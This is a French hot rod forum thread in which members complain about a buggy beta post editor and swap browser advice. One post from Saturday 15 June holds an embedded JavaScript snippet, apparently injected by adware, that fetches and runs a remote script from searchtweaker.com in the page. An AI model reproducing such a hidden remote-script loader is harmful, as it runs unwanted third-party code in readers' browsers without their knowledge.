Forum sur les Hot rods et Kustoms
 
AccueilAccueil  FAQFAQ  RechercherRechercher  S'enregistrerS'enregistrer  MembresMembres  GroupesGroupes  ConnexionConnexion  

Partagez | 
 

 poster un nouveau sujet

Voir le sujet précédent Voir le sujet suivant Aller en bas 
AuteurMessage
andy4rrrr

avatar

Nombre de messages : 6211
Age : 73
Localisation : en enfer
Points : 10938
Date d'inscription : 20/03/2007

MessageSujet: poster un nouveau sujet    Ven 14 Juin - 7:45

je ne sais pas pour vous mais moi dans mon cas la présentation pour répondre ou poster 1 message a changer 

je la trouve moins pratique et fonctionne pas
il a fallut que je mit repraine a 2 fois pour poster ou repondre

problème
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.dailymotion.com/andy4rrrr
pierrot

avatar

Nombre de messages : 1685
Localisation : in normandy
Points : 1801
Date d'inscription : 03/05/2012

MessageSujet: Re: poster un nouveau sujet    Ven 14 Juin - 8:03

Effectivement c est nouveau
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
andy4rrrr

avatar

Nombre de messages : 6211
Age : 73
Localisation : en enfer
Points : 10938
Date d'inscription : 20/03/2007

MessageSujet: poster un nouveau sujet   Ven 14 Juin - 8:06

oui mais pas convaincus dans mon cas
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.dailymotion.com/andy4rrrr
pierrot

avatar

Nombre de messages : 1685
Localisation : in normandy
Points : 1801
Date d'inscription : 03/05/2012

MessageSujet: Re: poster un nouveau sujet    Ven 14 Juin - 8:32

Pour ma part j aimerais savoir pourquoi recevoir un mail indiquant un message et qu il n y a rien dans la messagerie Question
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
34

avatar

Nombre de messages : 1792
Age : 49
Localisation : normandie/ france
Points : 2069
Date d'inscription : 03/12/2010

MessageSujet: Re: poster un nouveau sujet    Ven 14 Juin - 9:00

Ma page de messagerie et de réponse a un post a changé de couleur (c'est tout blanc) la dispo est diffèrente et je ne peux plus envoyer de MP de chez moi Confused  la page bloque l'ordi. Bon c'est pas le dernier cri Mr.Red  Mais avant ce changement tout marchait bien.
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
mika

avatar

Nombre de messages : 4831
Age : 44
Localisation : de l'autre côté de la frontière
Points : 5258
Date d'inscription : 04/08/2010

MessageSujet: Re: poster un nouveau sujet    Ven 14 Juin - 14:21

j'ai eu le probleme avec internet explorer , le pc ce bloquer obliger de l’éteindre .
depuis je suis passé avec google chrome tout rentre dans l'ordre Wink
enfin presque il y a encore quelques bug quand je cite sur un post impossible de repondre .
peut etre que fire fox accepte mieux Question 

affaire a suivre .
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.asphaltburners.be/
cedric
Rang: Administrateur
avatar

Nombre de messages : 6080
Age : 33
Localisation : Tournai, BELGIQUE
Points : 3219
Date d'inscription : 30/03/2005

MessageSujet: Re: poster un nouveau sujet    Ven 14 Juin - 17:23

Pareil pour mois. Bizard je vais essayer de trouver des infos sur le net.

_________________
---------------------------------------------------

Support : www.goodiesandfamily.com/
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.hot-rod.be
andy4rrrr

avatar

Nombre de messages : 6211
Age : 73
Localisation : en enfer
Points : 10938
Date d'inscription : 20/03/2007

MessageSujet: poster un nouveau sujet   Sam 15 Juin - 8:28

toujours le même problème
même sous firefox

c'est de la MERDE  lol!lol!lol!lol!
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.dailymotion.com/andy4rrrr
hot import

avatar

Nombre de messages : 7067
Age : 45
Localisation : entre terre et eau, dans le marais poitevin
Points : 4697
Date d'inscription : 11/01/2006

MessageSujet: Re: poster un nouveau sujet    Sam 15 Juin - 14:11

hello,

idem 34 pour la présentation des réponses....j'trouve ça limite pourri, y'a plus les émoticones a gauche, il faut cliquer sur celui au dessus et choisir..

idem sur hot rod pleasure, mais sur un autre forum d'usinage ou je traine ma tronche, ça fonctionne normal...

suis sur windows 7 et mozilla firefox actuellement...

j'envisage google chrome, il ai mieux et permet de n'importe ou de se connecter et d'avoir ses favoris via un compte et une connexion avec passe..

_________________
Apprends la sagesse dans la sottise des autres.
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
cedric
Rang: Administrateur
avatar

Nombre de messages : 6080
Age : 33
Localisation : Tournai, BELGIQUE
Points : 3219
Date d'inscription : 30/03/2005

MessageSujet: Re: poster un nouveau sujet    Sam 15 Juin - 16:13

J'ai un peu de nouvelle de foruactif.
 
Info mis sur leur facebook :
Il y a enfaite un nouvel éditeur qui est en cours.
 
"Bonjour,

Pas de panique ce n'est pour l'instant qu'une version bêta.

Merci de nous exposer tout les problèmes rencontrés sur le forum "

_________________
---------------------------------------------------

Support : www.goodiesandfamily.com/
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.hot-rod.be
andy4rrrr

avatar

Nombre de messages : 6211
Age : 73
Localisation : en enfer
Points : 10938
Date d'inscription : 20/03/2007

MessageSujet: poster un nouveau sujet   Dim 16 Juin - 8:55

c'est une version bêta

je dirai plutôt une version bête

perso je préfere firefox à google chrome
puis dans firefox il y a plein de modules complémentaire
a installer pour son confort de surfer 


et dans firefox va dans préférences il y a plein de paramètre 
a régler

mais autrement comme citer dans un autre message je me retrouve avec une ratatouille de merde sous mes messages
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.dailymotion.com/andy4rrrr
mika

avatar

Nombre de messages : 4831
Age : 44
Localisation : de l'autre côté de la frontière
Points : 5258
Date d'inscription : 04/08/2010

MessageSujet: Re: poster un nouveau sujet    Dim 16 Juin - 9:17

andy4rrrr a écrit:
c'est une version bêta

je dirai plutôt une version bête

perso je préfere firefox à google chrome
puis dans firefox il y a plein de modules complémentaire
a installer pour son confort de surfer 


et dans firefox va dans préférences il y a plein de paramètre 
a régler

mais autrement comme citer dans un autre message je me retrouve avec une ratatouille de merde sous mes messages

j'ai trouvé comment cela fonctionne
il faut cliquer sur le dernier icone de la baniere " basculer le mode d'edition "

Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.asphaltburners.be/
mika

avatar

Nombre de messages : 4831
Age : 44
Localisation : de l'autre côté de la frontière
Points : 5258
Date d'inscription : 04/08/2010

MessageSujet: Re: poster un nouveau sujet    Dim 16 Juin - 21:33

tout compte fait il y a des fonction amusante

surtout avec ce genre de trucs lol!
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.asphaltburners.be/
34

avatar

Nombre de messages : 1792
Age : 49
Localisation : normandie/ france
Points : 2069
Date d'inscription : 03/12/2010

MessageSujet: Re: poster un nouveau sujet    Dim 16 Juin - 21:54

T'es trop fort Mika Mr.Red

  Mais les MP sont toujours bloqué avec mon ordi à manivelle  What the fuck ?!?
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
mika

avatar

Nombre de messages : 4831
Age : 44
Localisation : de l'autre côté de la frontière
Points : 5258
Date d'inscription : 04/08/2010

MessageSujet: Re: poster un nouveau sujet    Dim 16 Juin - 22:04

TFHR.be
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.asphaltburners.be/
mika

avatar

Nombre de messages : 4831
Age : 44
Localisation : de l'autre côté de la frontière
Points : 5258
Date d'inscription : 04/08/2010

MessageSujet: Re: poster un nouveau sujet    Dim 16 Juin - 22:06

34 a écrit:
T'es trop fort Mika Mr.Red

  Mais les MP sont toujours bloqué avec mon ordi à manivelle  What the fuck ?!?

tu doit avoir internet explorer vire le , et a la place il faut google chrome ou fire fox Wink
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.asphaltburners.be/
mika

avatar

Nombre de messages : 4831
Age : 44
Localisation : de l'autre côté de la frontière
Points : 5258
Date d'inscription : 04/08/2010

MessageSujet: Re: poster un nouveau sujet    Dim 16 Juin - 22:13

tu n'est pas le seul a voir un vieux coucou 34.
le mien et de fin 2002 ( acheter chez aldi a l'epoque )il est sous windows xp j'ai plus de carte son il chauf comme une cocote mais il fonctionne encore bien pour le surf Wink
tout ce que je lui demande c'est d'aller correctement sur hotrod.be TFHR.be
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.asphaltburners.be/
34

avatar

Nombre de messages : 1792
Age : 49
Localisation : normandie/ france
Points : 2069
Date d'inscription : 03/12/2010

MessageSujet: Re: poster un nouveau sujet    Dim 16 Juin - 22:15

Je suis une grosse bille avec les ordi Rolling Eyes, j'arrive à les planter rien qu'en les regardant Mr. Green
  la dernière foi que j'ai tenté de téléchargé un truc (pour le GP de F1) Stèf a passé une aprem
 pour tout remettre en place. j'ai été privé de dessert pendant 4 jours Crying or Very sad
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
mika

avatar

Nombre de messages : 4831
Age : 44
Localisation : de l'autre côté de la frontière
Points : 5258
Date d'inscription : 04/08/2010

MessageSujet: Re: poster un nouveau sujet    Dim 16 Juin - 23:21

c'est aussi pour ça quelle sont la Mr. Green
toi tu n'est pas une bille ailleurs , et la c'est nous qui devont prendre des cours salut
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.asphaltburners.be/
andy4rrrr

avatar

Nombre de messages : 6211
Age : 73
Localisation : en enfer
Points : 10938
Date d'inscription : 20/03/2007

MessageSujet: poster un nouveau sujet   Lun 17 Juin - 7:45

a la technologie !!!!!!!!!!!!!!!!!!!!!!

je viens de tester ton conseil mika

on verra ce qu'il en ressort

après ce message

mais dans mon cas ça merdasse grave hot rod be actuellement pour poster
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.dailymotion.com/andy4rrrr
34

avatar

Nombre de messages : 1792
Age : 49
Localisation : normandie/ france
Points : 2069
Date d'inscription : 03/12/2010

MessageSujet: Re: poster un nouveau sujet    Lun 17 Juin - 10:25

Essais au boulot avec firefox mozilla (ou l'inverse) les MP partent bien. Mais toujours cette présentation sur fond blanc. 
  Ce qui confirme vos dire, à la maison j'ai internet explo et ça bloque.

  Merci Mika Embarassed mais le boss de la tôle ici c'est toi Wink
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
cedric
Rang: Administrateur
avatar

Nombre de messages : 6080
Age : 33
Localisation : Tournai, BELGIQUE
Points : 3219
Date d'inscription : 30/03/2005

MessageSujet: Re: poster un nouveau sujet    Lun 17 Juin - 11:06

Perso à part cette présentation nouvelle où l'on tape notre texte qui est sur fond blanc. Tout fonctionne chez moi.

_________________
---------------------------------------------------

Support : www.goodiesandfamily.com/
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.hot-rod.be
andy4rrrr

avatar

Nombre de messages : 6211
Age : 73
Localisation : en enfer
Points : 10938
Date d'inscription : 20/03/2007

MessageSujet: poster un nouveau sujet   Mar 18 Juin - 8:00

options MIKA

fonctionne pour moi pour le moment





dédicaces lol! lol! lol!


http://youtu.be/SYkJDq3Wwms
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.dailymotion.com/andy4rrrr
andy4rrrr

avatar

Nombre de messages : 6211
Age : 73
Localisation : en enfer
Points : 10938
Date d'inscription : 20/03/2007

MessageSujet: poster un nouveau sujet   Sam 22 Juin - 8:18

dans mon cas les smylés sont revenu du côté gauche comme avant


TFHR.beTFHR.beTFHR.be
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://www.dailymotion.com/andy4rrrr
Contenu sponsorisé




MessageSujet: Re: poster un nouveau sujet    

Revenir en haut Aller en bas
 
poster un nouveau sujet
Voir le sujet précédent Voir le sujet suivant Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» Comment Poster Un Nouveau Sujet
» Nouveau sujet à poster pour l'Australie (tarif eco SVP)
» Comment faire pour mettre une image sur un nouveau sujet ?
» Créateur de nouveau sujet co-administrateur
» Création d'un nouveau sujet

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Forum :: Questions administratives-
Sauter vers: